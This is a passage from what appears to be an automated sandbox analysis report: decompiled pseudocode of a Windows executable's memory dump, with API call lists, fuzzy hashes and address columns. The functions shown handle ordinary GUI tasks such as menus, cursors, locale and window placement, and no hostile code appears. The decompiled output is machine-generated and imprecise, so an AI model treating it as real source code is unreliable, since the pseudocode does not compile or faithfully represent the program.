                                                                                • SetCursor.USER32(00000000), ref: 0043379E
                                                                                  • Part of subcall function 0043D820: 73451770.COMCTL32(00000000,?,00433779), ref: 0043D83C
                                                                                  • Part of subcall function 0043D820: ShowCursor.USER32(000000FF,00000000,?,00433779), ref: 0043D857
                                                                                • SetCursor.USER32(00000000), ref: 00433789
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Cursor$DesktopWindow$73451770Show
                                                                                • String ID:
                                                                                • API String ID: 3513720257-0
                                                                                • Opcode ID: 5190dd761afb9cb6777465d1d1d9b02bff82538c644734909bf12f8524cc6476
                                                                                • Instruction ID: 927c149ca72bb9ae92c7face1fd7a0d2d6f86c9ae587c9d497579464b7a0dd95
                                                                                • Opcode Fuzzy Hash: 5190dd761afb9cb6777465d1d1d9b02bff82538c644734909bf12f8524cc6476
                                                                                • Instruction Fuzzy Hash: 0E91A5746092418FC304EF69D995A1A7BE2BF48369F2488BEE4148B372D738FD45CB49
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0044FAC0, Relevance: 6.1, APIs: 4, Instructions: 148windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 89%
                                                                                			E0044FAC0(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _t41;
				void* _t54;
				void* _t61;
				struct HMENU__* _t64;
				struct HMENU__* _t70;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t81;
				intOrPtr _t83;
				intOrPtr _t87;
				void* _t92;
				intOrPtr _t98;
				void* _t111;
				intOrPtr _t113;
				void* _t116;

				_t109 = __edi;
				_push(__edi);
				_v20 = 0;
				_t113 = __edx;
				_t92 = __eax;
				_push(_t116);
				_push(0x44fc86);
				_push( *[fs:eax]);
				 *[fs:eax] = _t116 + 0xfffffff0;
				if(__edx == 0) {
					L7:
					_t39 =  *((intOrPtr*)(_t92 + 0x248));
					if( *((intOrPtr*)(_t92 + 0x248)) != 0) {
						E00448D84(_t39, 0, _t109, 0);
					}
					if(( *(_t92 + 0x1c) & 0x00000008) != 0 || _t113 != 0 && ( *(_t113 + 0x1c) & 0x00000008) != 0) {
						_t113 = 0;
					}
					 *((intOrPtr*)(_t92 + 0x248)) = _t113;
					if(_t113 != 0) {
						E0041B98C(_t113, _t92);
					}
					if(_t113 == 0 || ( *(_t92 + 0x1c) & 0x00000010) == 0 &&  *((char*)(_t92 + 0x229)) == 3) {
						_t41 = E0043C018(_t92);
						__eflags = _t41;
						if(_t41 != 0) {
							SetMenu(E0043BD14(_t92), 0);
						}
						goto L30;
					} else {
						if( *((char*)( *((intOrPtr*)(_t92 + 0x248)) + 0x5c)) != 0 ||  *((char*)(_t92 + 0x22f)) == 1) {
							if(( *(_t92 + 0x1c) & 0x00000010) == 0) {
								__eflags =  *((char*)(_t92 + 0x22f)) - 1;
								if( *((char*)(_t92 + 0x22f)) != 1) {
									_t54 = E0043C018(_t92);
									__eflags = _t54;
									if(_t54 != 0) {
										SetMenu(E0043BD14(_t92), 0);
									}
								}
								goto L30;
							}
							goto L21;
						} else {
							L21:
							if(E0043C018(_t92) != 0) {
								_t61 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
								_t110 = _t61;
								_t64 = GetMenu(E0043BD14(_t92));
								_t138 = _t61 - _t64;
								if(_t61 != _t64) {
									_t70 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
									SetMenu(E0043BD14(_t92), _t70);
								}
								E00448D84(_t113, E0043BD14(_t92), _t110, _t138);
							}
							L30:
							if( *((char*)(_t92 + 0x22e)) != 0) {
								E00450B80(_t92, 1);
							}
							E0044F9F8(_t92);
							_pop(_t98);
							 *[fs:eax] = _t98;
							_push(0x44fc8d);
							return E00404320( &_v20);
						}
					}
				}
				_t77 =  *0x487c00; // 0x2290f1c
				_t79 = E00453244(_t77) - 1;
				if(_t79 >= 0) {
					_v8 = _t79 + 1;
					_t111 = 0;
					do {
						_t81 =  *0x487c00; // 0x2290f1c
						if(_t113 ==  *((intOrPtr*)(E00453230(_t81, _t111) + 0x248))) {
							_t83 =  *0x487c00; // 0x2290f1c
							if(_t92 != E00453230(_t83, _t111)) {
								_v16 =  *((intOrPtr*)(_t113 + 8));
								_v12 = 0xb;
								_t87 =  *0x486acc; // 0x41ce84
								E00406520(_t87,  &_v20);
								E0040A0EC(_t92, _v20, 1, _t111, _t113, 0,  &_v16);
								E00403D80();
							}
						}
						_t111 = _t111 + 1;
						_t10 =  &_v8;
						 *_t10 = _v8 - 1;
					} while ( *_t10 != 0);
				}
			}






















                                                                                0x0044fac0
                                                                                0x0044fac8
                                                                                0x0044facb
                                                                                0x0044face
                                                                                0x0044fad0
                                                                                0x0044fad4
                                                                                0x0044fad5
                                                                                0x0044fada
                                                                                0x0044fadd
                                                                                0x0044fae2
                                                                                0x0044fb54
                                                                                0x0044fb54
                                                                                0x0044fb5c
                                                                                0x0044fb60
                                                                                0x0044fb60
                                                                                0x0044fb69
                                                                                0x0044fb75
                                                                                0x0044fb75
                                                                                0x0044fb77
                                                                                0x0044fb7f
                                                                                0x0044fb85
                                                                                0x0044fb85
                                                                                0x0044fb8c
                                                                                0x0044fc3f
                                                                                0x0044fc44
                                                                                0x0044fc46
                                                                                0x0044fc52
                                                                                0x0044fc52
                                                                                0x00000000
                                                                                0x0044fba5
                                                                                0x0044fbaf
                                                                                0x0044fbbe
                                                                                0x0044fc18
                                                                                0x0044fc1f
                                                                                0x0044fc23
                                                                                0x0044fc28
                                                                                0x0044fc2a
                                                                                0x0044fc36
                                                                                0x0044fc36
                                                                                0x0044fc2a
                                                                                0x00000000
                                                                                0x0044fc1f
                                                                                0x00000000
                                                                                0x0044fbc0
                                                                                0x0044fbc0
                                                                                0x0044fbc9
                                                                                0x0044fbd7
                                                                                0x0044fbda
                                                                                0x0044fbe4
                                                                                0x0044fbe9
                                                                                0x0044fbeb
                                                                                0x0044fbf5
                                                                                0x0044fc01
                                                                                0x0044fc01
                                                                                0x0044fc11
                                                                                0x0044fc11
                                                                                0x0044fc57
                                                                                0x0044fc5e
                                                                                0x0044fc64
                                                                                0x0044fc64
                                                                                0x0044fc6b
                                                                                0x0044fc72
                                                                                0x0044fc75
                                                                                0x0044fc78
                                                                                0x0044fc85
                                                                                0x0044fc85
                                                                                0x0044fbaf
                                                                                0x0044fb8c
                                                                                0x0044fae4
                                                                                0x0044faee
                                                                                0x0044faf1
                                                                                0x0044faf4
                                                                                0x0044faf7
                                                                                0x0044faf9
                                                                                0x0044fafb
                                                                                0x0044fb0b
                                                                                0x0044fb0f
                                                                                0x0044fb1b
                                                                                0x0044fb20
                                                                                0x0044fb23
                                                                                0x0044fb30
                                                                                0x0044fb35
                                                                                0x0044fb44
                                                                                0x0044fb49
                                                                                0x0044fb49
                                                                                0x0044fb1b
                                                                                0x0044fb4e
                                                                                0x0044fb4f
                                                                                0x0044fb4f
                                                                                0x0044fb4f
                                                                                0x0044faf9

                                                                                APIs
                                                                                • GetMenu.USER32(00000000), ref: 0044FBE4
                                                                                • SetMenu.USER32(00000000,00000000), ref: 0044FC01
                                                                                • SetMenu.USER32(00000000,00000000), ref: 0044FC36
                                                                                • SetMenu.USER32(00000000,00000000,00000000,0044FC86), ref: 0044FC52
                                                                                  • Part of subcall function 00406520: LoadStringA.USER32 ref: 00406551
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Menu$LoadString
                                                                                • String ID:
                                                                                • API String ID: 3688185913-0
                                                                                • Opcode ID: 59f43950d7913d04527af4127a480d71e380f0d7e75c0bbe65dfa983d28bef75
                                                                                • Instruction ID: f26370d87fe6636909658d251d97ac89f97443a29d0f9f175af0801ea8a7ce81
                                                                                • Opcode Fuzzy Hash: 59f43950d7913d04527af4127a480d71e380f0d7e75c0bbe65dfa983d28bef75
                                                                                • Instruction Fuzzy Hash: 8751D330A002885AEB60AF7AC8D575A7694AF05308F18557FEC149B397CB3CEC4C8B9D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040AD70, Relevance: 6.1, APIs: 4, Instructions: 95threadCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040AD70() {
				char _v152;
				short _v410;
				signed short _t14;
				signed int _t16;
				int _t18;
				void* _t20;
				void* _t23;
				int _t24;
				int _t26;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t37;
				int* _t39;
				short* _t41;
				void* _t49;

				 *0x4877f0 = 0x409;
				 *0x4877f4 = 9;
				 *0x4877f8 = 1;
				_t14 = GetThreadLocale();
				if(_t14 != 0) {
					 *0x4877f0 = _t14;
				}
				if(_t14 != 0) {
					 *0x4877f4 = _t14 & 0x3ff;
					 *0x4877f8 = (_t14 & 0x0000ffff) >> 0xa;
				}
				memcpy(0x46b0c0, 0x40aec4, 8 << 2);
				if( *0x46b0ac != 2) {
					_t16 = GetSystemMetrics(0x4a);
					__eflags = _t16;
					 *0x4877fd = _t16 & 0xffffff00 | _t16 != 0x00000000;
					_t18 = GetSystemMetrics(0x2a);
					__eflags = _t18;
					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
					 *0x4877fc = _t31;
					__eflags = _t31;
					if(__eflags != 0) {
						return E0040ACF8(__eflags, _t49);
					}
				} else {
					_t20 = E0040AD58();
					if(_t20 != 0) {
						 *0x4877fd = 0;
						 *0x4877fc = 0;
						return _t20;
					}
					E0040ACF8(__eflags, _t49);
					_t37 = 0x20;
					_t23 = E004030F8(0x46b0c0, 0x20, 0x40aec4);
					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
					 *0x4877fc = _t32;
					__eflags = _t32;
					if(_t32 != 0) {
						 *0x4877fd = 0;
						return _t23;
					}
					_t24 = 0x80;
					_t39 =  &_v152;
					do {
						 *_t39 = _t24;
						_t24 = _t24 + 1;
						_t39 =  &(_t39[0]);
						__eflags = _t24 - 0x100;
					} while (_t24 != 0x100);
					_t26 =  *0x4877f0; // 0x409
					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
					_t18 = 0x80;
					_t41 =  &_v410;
					while(1) {
						__eflags =  *_t41 - 2;
						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
						 *0x4877fd = _t37;
						__eflags = _t37;
						if(_t37 != 0) {
							goto L17;
						}
						_t41 = _t41 + 2;
						_t18 = _t18 - 1;
						__eflags = _t18;
						if(_t18 != 0) {
							continue;
						} else {
							return _t18;
						}
						L18:
					}
				}
				L17:
				return _t18;
				goto L18;
			}



















                                                                                0x0040ad7c
                                                                                0x0040ad86
                                                                                0x0040ad90
                                                                                0x0040ad9a
                                                                                0x0040ada1
                                                                                0x0040ada3
                                                                                0x0040ada3
                                                                                0x0040adab
                                                                                0x0040adb7
                                                                                0x0040adc3
                                                                                0x0040adc3
                                                                                0x0040add7
                                                                                0x0040ade0
                                                                                0x0040ae8f
                                                                                0x0040ae94
                                                                                0x0040ae99
                                                                                0x0040aea0
                                                                                0x0040aea5
                                                                                0x0040aea7
                                                                                0x0040aeaa
                                                                                0x0040aeb0
                                                                                0x0040aeb2
                                                                                0x00000000
                                                                                0x0040aeba
                                                                                0x0040ade6
                                                                                0x0040ade6
                                                                                0x0040aded
                                                                                0x0040adef
                                                                                0x0040adf6
                                                                                0x00000000
                                                                                0x0040adf6
                                                                                0x0040ae03
                                                                                0x0040ae13
                                                                                0x0040ae15
                                                                                0x0040ae1a
                                                                                0x0040ae1d
                                                                                0x0040ae23
                                                                                0x0040ae25
                                                                                0x0040ae27
                                                                                0x00000000
                                                                                0x0040ae27
                                                                                0x0040ae33
                                                                                0x0040ae38
                                                                                0x0040ae3e
                                                                                0x0040ae3e
                                                                                0x0040ae40
                                                                                0x0040ae41
                                                                                0x0040ae42
                                                                                0x0040ae42
                                                                                0x0040ae5e
                                                                                0x0040ae64
                                                                                0x0040ae69
                                                                                0x0040ae6e
                                                                                0x0040ae74
                                                                                0x0040ae74
                                                                                0x0040ae78
                                                                                0x0040ae7b
                                                                                0x0040ae81
                                                                                0x0040ae83
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040ae85
                                                                                0x0040ae88
                                                                                0x0040ae88
                                                                                0x0040ae89
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040ae89
                                                                                0x0040ae74
                                                                                0x0040aec1
                                                                                0x0040aec1
                                                                                0x00000000

                                                                                APIs
                                                                                • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040AE64
                                                                                • GetThreadLocale.KERNEL32 ref: 0040AD9A
                                                                                  • Part of subcall function 0040ACF8: GetCPInfo.KERNEL32(00000000,?), ref: 0040AD11
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: InfoLocaleStringThreadType
                                                                                • String ID:
                                                                                • API String ID: 1505017576-0
                                                                                • Opcode ID: 0e1c3126f2dfff17c11bd57b361e3b5cd354b25a85c6cacead5f27272a7d8c4f
                                                                                • Instruction ID: 7b20ac4ac1a8ba6006ade8caa557296e2a43b71a996097c4bdc0da4cb0750b93
                                                                                • Opcode Fuzzy Hash: 0e1c3126f2dfff17c11bd57b361e3b5cd354b25a85c6cacead5f27272a7d8c4f
                                                                                • Instruction Fuzzy Hash: 9D3154315883468AE7109725ED25B9B3794EB01300F6484BFEC54AB3C1DB3C9855C7AF
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00422DCC, Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 64%
                                                                                			E00422DCC(intOrPtr __eax, void* __edx) {
				intOrPtr _v8;
				void* __ebx;
				void* __ecx;
				void* __esi;
				void* __ebp;
				intOrPtr _t33;
				struct HDC__* _t47;
				intOrPtr _t54;
				intOrPtr _t58;
				struct HDC__* _t66;
				void* _t67;
				intOrPtr _t76;
				void* _t81;
				intOrPtr _t82;
				intOrPtr _t84;
				intOrPtr _t86;

				_t84 = _t86;
				_push(_t67);
				_v8 = __eax;
				_t33 = _v8;
				if( *((intOrPtr*)(_t33 + 0x58)) == 0) {
					return _t33;
				} else {
					E0041FA80(_v8);
					_push(_t84);
					_push(0x422eab);
					_push( *[fs:eax]);
					 *[fs:eax] = _t86;
					E004240E8( *((intOrPtr*)(_v8 + 0x58)));
					E00422C48( *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8));
					_t47 = E004242C8( *((intOrPtr*)(_v8 + 0x58)));
					_push(0);
					L00406A58();
					_t66 = _t47;
					_t81 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8);
					if(_t81 == 0) {
						 *((intOrPtr*)(_v8 + 0x5c)) = 0;
					} else {
						 *((intOrPtr*)(_v8 + 0x5c)) = SelectObject(_t66, _t81);
					}
					_t54 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28));
					_t82 =  *((intOrPtr*)(_t54 + 0x10));
					if(_t82 == 0) {
						 *((intOrPtr*)(_v8 + 0x60)) = 0;
					} else {
						_push(0xffffffff);
						_push(_t82);
						_push(_t66);
						L00406BD0();
						 *((intOrPtr*)(_v8 + 0x60)) = _t54;
						_push(_t66);
						L00406BA0();
					}
					E0041FE44(_v8, _t66);
					_t58 =  *0x46b788; // 0x2290b74
					E0041428C(_t58, _t66, _t67, _v8, _t82);
					_pop(_t76);
					 *[fs:eax] = _t76;
					_push(0x422eb2);
					return E0041FC98(_v8);
				}
			}



















                                                                                0x00422dcd
                                                                                0x00422dcf
                                                                                0x00422dd2
                                                                                0x00422dd5
                                                                                0x00422ddc
                                                                                0x00422eb6
                                                                                0x00422de2
                                                                                0x00422de5
                                                                                0x00422dec
                                                                                0x00422ded
                                                                                0x00422df2
                                                                                0x00422df5
                                                                                0x00422dfe
                                                                                0x00422e0f
                                                                                0x00422e1a
                                                                                0x00422e1f
                                                                                0x00422e21
                                                                                0x00422e26
                                                                                0x00422e31
                                                                                0x00422e36
                                                                                0x00422e4c
                                                                                0x00422e38
                                                                                0x00422e42
                                                                                0x00422e42
                                                                                0x00422e55
                                                                                0x00422e58
                                                                                0x00422e5d
                                                                                0x00422e7b
                                                                                0x00422e5f
                                                                                0x00422e5f
                                                                                0x00422e61
                                                                                0x00422e62
                                                                                0x00422e63
                                                                                0x00422e6b
                                                                                0x00422e6e
                                                                                0x00422e6f
                                                                                0x00422e6f
                                                                                0x00422e83
                                                                                0x00422e8b
                                                                                0x00422e90
                                                                                0x00422e97
                                                                                0x00422e9a
                                                                                0x00422e9d
                                                                                0x00422eaa
                                                                                0x00422eaa

                                                                                APIs
                                                                                  • Part of subcall function 0041FA80: RtlEnterCriticalSection.KERNEL32(00487A5C,00000000,0041E21E,00000000,0041E27D), ref: 0041FA88
                                                                                  • Part of subcall function 0041FA80: RtlLeaveCriticalSection.KERNEL32(00487A5C,00487A5C,00000000,0041E21E,00000000,0041E27D), ref: 0041FA95
                                                                                  • Part of subcall function 0041FA80: RtlEnterCriticalSection.KERNEL32(00000038,00487A5C,00487A5C,00000000,0041E21E,00000000,0041E27D), ref: 0041FA9E
                                                                                  • Part of subcall function 004242C8: 72E7AC50.USER32(00000000,?,?,?,?,00422E1F,00000000,00422EAB), ref: 0042431E
                                                                                  • Part of subcall function 004242C8: 72E7AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,00422E1F,00000000,00422EAB), ref: 00424333
                                                                                  • Part of subcall function 004242C8: 72E7AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,00422E1F,00000000,00422EAB), ref: 0042433D
                                                                                  • Part of subcall function 004242C8: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00422E1F,00000000,00422EAB), ref: 00424361
                                                                                  • Part of subcall function 004242C8: 72E7B380.USER32(00000000,00000000,00000000,?,?,?,?,00422E1F,00000000,00422EAB), ref: 0042436C
                                                                                • 72E7A590.GDI32(00000000,00000000,00422EAB), ref: 00422E21
                                                                                • SelectObject.GDI32(00000000,?), ref: 00422E3A
                                                                                • 72E7B410.GDI32(00000000,?,000000FF,00000000,00000000,00422EAB), ref: 00422E63
                                                                                • 72E7B150.GDI32(00000000,00000000,?,000000FF,00000000,00000000,00422EAB), ref: 00422E6F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CriticalSection$Enter$A590B150B380B410CreateHalftoneLeaveObjectPaletteSelect
                                                                                • String ID:
                                                                                • API String ID: 2198039625-0
                                                                                • Opcode ID: 40b5213d90e1f6223c6eae0d1e643623537daa9ac4c850ee3c106ff55ed6b37c
                                                                                • Instruction ID: e9a11356e23c73f42dbca714b493990e2baf7ab793a4ed1f979a99725cee0618
                                                                                • Opcode Fuzzy Hash: 40b5213d90e1f6223c6eae0d1e643623537daa9ac4c850ee3c106ff55ed6b37c
                                                                                • Instruction Fuzzy Hash: 9331F874B00614EFC704EB59D981D4EB3F5EF48314B6241A6E404AB362D678AE80EB44
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00449170, Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00449170(void* __eax, struct HMENU__* __edx, int _a4, int _a8, CHAR* _a12) {
				intOrPtr _v8;
				void* __ecx;
				void* __edi;
				int _t27;
				void* _t40;
				int _t41;
				int _t50;

				_t50 = _t41;
				_t49 = __edx;
				_t40 = __eax;
				if(E0044887C(__eax) == 0) {
					return GetMenuStringA(__edx, _t50, _a12, _a8, _a4);
				}
				_v8 = 0;
				if((GetMenuState(__edx, _t50, _a4) & 0x00000010) == 0) {
					_t27 = GetMenuItemID(_t49, _t50);
					_t51 = _t27;
					if(_t27 != 0xffffffff) {
						_v8 = E004486F8(_t40, 0, _t51);
					}
				} else {
					_t49 = GetSubMenu(_t49, _t50);
					_v8 = E004486F8(_t40, 1, _t37);
				}
				if(_v8 == 0) {
					return 0;
				} else {
					 *_a12 = 0;
					E00408BFC(_a12, _a8,  *((intOrPtr*)(_v8 + 0x30)));
					return E00408B40(_a12, _t49);
				}
			}










                                                                                0x00449177
                                                                                0x00449179
                                                                                0x0044917b
                                                                                0x00449186
                                                                                0x00000000
                                                                                0x0044920a
                                                                                0x0044918a
                                                                                0x0044919a
                                                                                0x004491b7
                                                                                0x004491bc
                                                                                0x004491c1
                                                                                0x004491ce
                                                                                0x004491ce
                                                                                0x0044919c
                                                                                0x004491a3
                                                                                0x004491b0
                                                                                0x004491b0
                                                                                0x004491d5
                                                                                0x00000000
                                                                                0x004491d7
                                                                                0x004491da
                                                                                0x004491e9
                                                                                0x00000000
                                                                                0x004491f1

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Menu$ItemStateString
                                                                                • String ID:
                                                                                • API String ID: 306270399-0
                                                                                • Opcode ID: a51c3bca0f35a20612332bc3a4a573b4f11e14603d658cd76a0853a35b361683
                                                                                • Instruction ID: e1c24750740d557e1e8c84f7fe76103c4d55c31368cde85f8e0fd78e7a4e0c38
                                                                                • Opcode Fuzzy Hash: a51c3bca0f35a20612332bc3a4a573b4f11e14603d658cd76a0853a35b361683
                                                                                • Instruction Fuzzy Hash: 7011B431301214AFE700EE6DCC85DAF77E8AF49354B10446EF919E7382CA38ED01A7A8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0045AF4C, Relevance: 6.1, APIs: 4, Instructions: 68windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0045AF4C(intOrPtr* __eax, int __ecx, RECT* __edx) {
				int _t9;
				int _t12;
				int _t26;
				int _t34;
				int _t37;
				intOrPtr* _t43;
				int* _t44;

				_t37 = __ecx;
				_t44 = __edx;
				_t43 = __eax;
				_t9 = IsRectEmpty(__edx);
				_t47 = _t9;
				if(_t9 != 0) {
					return E0045AEE4(_t43, _t47);
				}
				 *((intOrPtr*)( *_t43 + 0x94))();
				__eflags = _t37;
				if(_t37 != 0) {
					L5:
					_t12 = 1;
				} else {
					_t34 = IsWindowVisible(E0043BD14(_t43));
					__eflags = _t34;
					if(_t34 == 0) {
						goto L5;
					} else {
						_t12 = 0;
					}
				}
				E0045AE60(_t43);
				SetWindowPos(E0043BD14(_t43), 0,  *_t44, _t44[1], _t44[2] -  *_t44, _t44[3] - _t44[1], 0x48);
				 *((intOrPtr*)( *_t43 + 0xf8))();
				__eflags = _t12;
				if(__eflags != 0) {
					E0045AE60(_t43);
				}
				_t26 = E004037B0( *((intOrPtr*)(_t43 + 0x240)), __eflags);
				__eflags = _t26;
				if(_t26 != 0) {
					return SetFocus(E0043BD14(_t43));
				}
				return _t26;
			}










                                                                                0x0045af50
                                                                                0x0045af52
                                                                                0x0045af54
                                                                                0x0045af57
                                                                                0x0045af5c
                                                                                0x0045af5e
                                                                                0x00000000
                                                                                0x0045af62
                                                                                0x0045af70
                                                                                0x0045af76
                                                                                0x0045af78
                                                                                0x0045af8f
                                                                                0x0045af8f
                                                                                0x0045af7a
                                                                                0x0045af82
                                                                                0x0045af87
                                                                                0x0045af89
                                                                                0x00000000
                                                                                0x0045af8b
                                                                                0x0045af8b
                                                                                0x0045af8b
                                                                                0x0045af89
                                                                                0x0045af95
                                                                                0x0045afba
                                                                                0x0045afc3
                                                                                0x0045afc9
                                                                                0x0045afcb
                                                                                0x0045afcf
                                                                                0x0045afcf
                                                                                0x0045afde
                                                                                0x0045afe3
                                                                                0x0045afe5
                                                                                0x00000000
                                                                                0x0045afef
                                                                                0x0045aff8

                                                                                APIs
                                                                                • IsRectEmpty.USER32 ref: 0045AF57
                                                                                • IsWindowVisible.USER32(00000000), ref: 0045AF82
                                                                                • SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000048,?,?,?,?,0045B063,0045FEAC), ref: 0045AFBA
                                                                                • SetFocus.USER32(00000000,?,?,?,?,00000048,?,?,?,?,0045B063,0045FEAC), ref: 0045AFEF
                                                                                  • Part of subcall function 0045AEE4: IsWindowVisible.USER32(00000000), ref: 0045AEFB
                                                                                  • Part of subcall function 0045AEE4: SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,0000008C,00000000,?,?,0045FD56,0045FD5E,?,?,0045B6B4), ref: 0045AF22
                                                                                  • Part of subcall function 0045AEE4: SetFocus.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,0000008C,00000000,?,?,0045FD56,0045FD5E,?,?,0045B6B4), ref: 0045AF42
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Window$FocusVisible$EmptyRect
                                                                                • String ID:
                                                                                • API String ID: 698668684-0
                                                                                • Opcode ID: 36b04a0efda56d6c7fd9ea4d84da65bd67b35b67db63215a326bf2bc792afe28
                                                                                • Instruction ID: aa951be320cb66b1e7991dbc00dcf3a6d2376953a5889a30f220f311acb53e10
                                                                                • Opcode Fuzzy Hash: 36b04a0efda56d6c7fd9ea4d84da65bd67b35b67db63215a326bf2bc792afe28
